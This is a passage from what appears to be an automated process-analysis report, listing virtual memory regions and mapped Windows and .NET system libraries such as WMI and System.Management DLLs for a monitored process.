"\\Windows\\SysWOW64\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wmiutils.dll") Region: id = 1871 start_va = 0x6aa40000 end_va = 0x6aa50fff monitored = 0 entry_point = 0x6aa48fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 2020 start_va = 0x6a980000 end_va = 0x6aa3efff monitored = 0 entry_point = 0x6a9b1e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 2021 start_va = 0x69a60000 end_va = 0x69ae0fff monitored = 0 entry_point = 0x69a7b260 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll") Region: id = 2022 start_va = 0x2030000 end_va = 0x203efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wbemdisp.tlb" filename = "\\Windows\\SysWOW64\\wbem\\wbemdisp.tlb" (normalized: "c:\\windows\\syswow64\\wbem\\wbemdisp.tlb") Region: id = 2023 start_va = 0x4c30000 end_va = 0x4d0ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 2024 start_va = 0x2040000 end_va = 0x204ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2025 start_va = 0x2040000 end_va = 0x204ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2026 start_va = 0x2040000 end_va = 0x204ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2027 start_va = 0x2040000 end_va = 0x204ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2028 start_va = 0x2040000 end_va = 0x204ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2029 start_va = 0x2040000 end_va = 0x204ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2030 start_va = 0x2040000 end_va = 0x204ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2031 start_va = 0x2040000 end_va = 0x204ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2032 start_va = 0x2040000 end_va = 0x204ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2033 start_va = 0x2040000 end_va = 0x204ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2034 start_va = 0x2040000 end_va = 0x204ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2035 start_va = 0x2040000 end_va = 0x204ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2036 start_va = 0x2040000 end_va = 0x204ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2037 start_va = 0x2040000 end_va = 0x204ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2038 start_va = 0x2040000 end_va = 0x204ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2039 start_va = 0x46d0000 end_va = 0x46dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046d0000" filename = "" Region: id = 2040 start_va = 0x46d0000 end_va = 0x46dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046d0000" filename = "" Region: id = 2041 start_va = 0x46d0000 end_va = 0x46dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046d0000" filename = "" Region: id = 2042 start_va = 0x2040000 end_va = 0x204ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2043 start_va = 0x2040000 end_va = 0x204ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2044 start_va = 0x2040000 end_va = 0x204ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2045 start_va = 0x2040000 end_va = 0x204ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2046 start_va = 0x2040000 end_va = 0x204ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2048 start_va = 0x2040000 end_va = 0x204ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2050 start_va = 0x65a70000 end_va = 0x65a87fff monitored = 1 entry_point = 0x65a755a6 region_type = mapped_file name = "custommarshalers.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\CustomMarshalers\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\CustomMarshalers.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\custommarshalers\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\custommarshalers.dll") Region: id = 2053 start_va = 0x46d0000 end_va = 0x46e7fff monitored = 1 entry_point = 0x46d55a6 region_type = mapped_file name = "custommarshalers.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\CustomMarshalers\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\CustomMarshalers.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\custommarshalers\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\custommarshalers.dll") Region: id = 2054 start_va = 0x2040000 end_va = 0x204ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2055 start_va = 0x65a70000 end_va = 0x65a87fff monitored = 1 entry_point = 0x65a755a6 region_type = mapped_file name = "custommarshalers.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\CustomMarshalers\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\CustomMarshalers.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\custommarshalers\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\custommarshalers.dll") Region: id = 2056 start_va = 0x47b0000 end_va = 0x47c7fff monitored = 1 entry_point = 0x47b55a6 region_type = mapped_file name = "custommarshalers.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\CustomMarshalers\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\CustomMarshalers.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\custommarshalers\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\custommarshalers.dll") Region: id = 2057 start_va = 0x46f0000 end_va = 0x46fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046f0000" filename = "" Region: id = 2058 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2059 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2060 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2061 start_va = 0x47b0000 end_va = 0x47b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000047b0000" filename = "" Region: id = 2062 start_va = 0x47b0000 end_va = 0x47b4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\SysWOW64\\stdole2.tlb" (normalized: "c:\\windows\\syswow64\\stdole2.tlb") Region: id = 2063 start_va = 0x47c0000 end_va = 0x47cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047c0000" filename = "" Region: id = 2064 start_va = 0x47c0000 end_va = 0x47cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047c0000" filename = "" Region: id = 2065 start_va = 0x47c0000 end_va = 0x47cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047c0000" filename = "" Region: id = 2066 start_va = 0x47c0000 end_va = 0x47cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047c0000" filename = "" Region: id = 2067 start_va = 0x47c0000 end_va = 0x47cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047c0000" filename = "" Region: id = 2068 start_va = 0x47c0000 end_va = 0x47cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047c0000" filename = "" Region: id = 2069 start_va = 0x47c0000 end_va = 0x47cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047c0000" filename = "" Region: id = 2070 start_va = 0x47c0000 end_va = 0x47cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047c0000" filename = "" Region: id = 2071 start_va = 0x47c0000 end_va = 0x47cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047c0000" filename = "" Region: id = 2072 start_va = 0x47c0000 end_va = 0x47cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047c0000" filename = "" Region: id = 2073 start_va = 0x47c0000 end_va = 0x47cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047c0000" filename = "" Region: id = 2074 start_va = 0x47c0000 end_va = 0x47cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047c0000" filename = "" Region: id = 2075 start_va = 0x47d0000 end_va = 0x47dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047d0000" filename = "" Region: id = 2076 start_va = 0x47d0000 end_va = 0x47dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047d0000" filename = "" Region: id = 2077 start_va = 0x47d0000 end_va = 0x47dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047d0000" filename = "" Region: id = 2078 start_va = 0x657e0000 end_va = 0x658fcfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\98d3949f9ba1a384939805aa5e47e933\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.management\\98d3949f9ba1a384939805aa5e47e933\\system.management.ni.dll") Region: id = 2079 start_va = 0x47c0000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047c0000" filename = "" Region: id = 2080 start_va = 0x4d10000 end_va = 0x4e0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d10000" filename = "" Region: id = 2081 start_va = 0x7fe60000 end_va = 0x7feaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fe60000" filename = "" Region: id = 2082 start_va = 0x7fe50000 end_va = 0x7fe5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fe50000" filename = "" Region: id = 2083 start_va = 0x4e10000 end_va = 0x4e4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e10000" filename = "" Region: id = 2084 start_va = 0x4e50000 end_va = 0x4f4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e50000" filename = "" Region: id = 2085 start_va = 0x65a60000 end_va = 0x65a6afff monitored = 1 entry_point = 0x65a641f0 region_type = mapped_file name = "wminet_utils.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\WMINet_Utils.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\wminet_utils.dll") Region: id = 2086 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2087 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2088 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2090 start_va = 0x4800000 end_va = 0x4804fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004800000" filename = "" Region: id = 2413 start_va = 0x4800000 end_va = 0x4802fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004800000" filename = "" Region: id = 2414 start_va = 0x4f50000 end_va = 0x4f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f50000" filename = "" Region: id = 2415 start_va = 0x4f90000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f90000" filename = "" Region: id = 2417 start_va = 0x4800000 end_va = 0x4812fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004800000" filename = "" Region: id = 2431 start_va = 0x4800000 end_va = 0x4802fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004800000" filename = "" Region: id = 2432 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2433 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2434 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2435 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2436 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2437 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2438 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2439 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2440 start_va = 0x4f50000 end_va = 0x4f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f50000" filename = "" Region: id = 2441 start_va = 0x4f90000 end_va = 0x4fcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f90000" filename = "" Region: id = 2442 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2443 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2444 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2445 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2446 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2447 start_va = 0x4fd0000 end_va = 0x500ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004fd0000" filename = "" Region: id = 2448 start_va = 0x5010000 end_va = 0x510ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005010000" filename = "" Region: id = 2449 start_va = 0x5110000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005110000" filename = "" Region: id = 2450 start_va = 0x5150000 end_va = 0x518ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005150000" filename = "" Region: id = 2451 start_va = 0x5190000 end_va = 0x519ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 2452 start_va = 0x51a0000 end_va = 0x51affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051a0000" filename = "" Region: id = 2453 start_va = 0x51b0000 end_va = 0x51bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051b0000" filename = "" Region: id = 2454 start_va = 0x51c0000 end_va = 0x51cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051c0000" filename = "" Region: id = 2455 start_va = 0x51d0000 end_va = 0x51dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051d0000" filename = "" Region: id = 2456 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2457 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2458 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2459 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2460 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2461 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2462 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2463 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2464 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2465 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2466 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2467 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2468 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2469 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2470 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2471 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2472 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2473 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2474 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2475 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2476 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2477 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2478 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2479 start_va = 0x5190000 end_va = 0x519ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 2480 start_va = 0x51a0000 end_va = 0x51affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051a0000" filename = "" Region: id = 2481 start_va = 0x51b0000 end_va = 0x51bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051b0000" filename = "" Region: id = 2482 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2483 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2484 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2485 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2486 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2487 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2488 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2489 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2490 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2491 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2492 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2493 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2494 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2495 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2496 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2497 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2498 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2499 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2500 start_va = 0x5190000 end_va = 0x519ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 2501 start_va = 0x5190000 end_va = 0x519ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 2502 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2503 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2504 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2505 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2506 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2507 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2508 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2509 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2510 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2511 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2512 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2513 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2514 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2515 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2516 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2517 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2518 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2519 start_va = 0x5190000 end_va = 0x519ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 2520 start_va = 0x5190000 end_va = 0x519ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 2521 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2522 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2523 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2524 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2525 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2526 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2527 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2528 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2529 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2530 start_va = 0x5190000 end_va = 0x519ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 2531 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2532 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2533 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2534 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2535 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2536 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2537 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2538 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2539 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2540 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2541 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2542 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2543 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2544 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2545 start_va = 0x5190000 end_va = 0x519ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 2546 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2547 start_va = 0x4810000 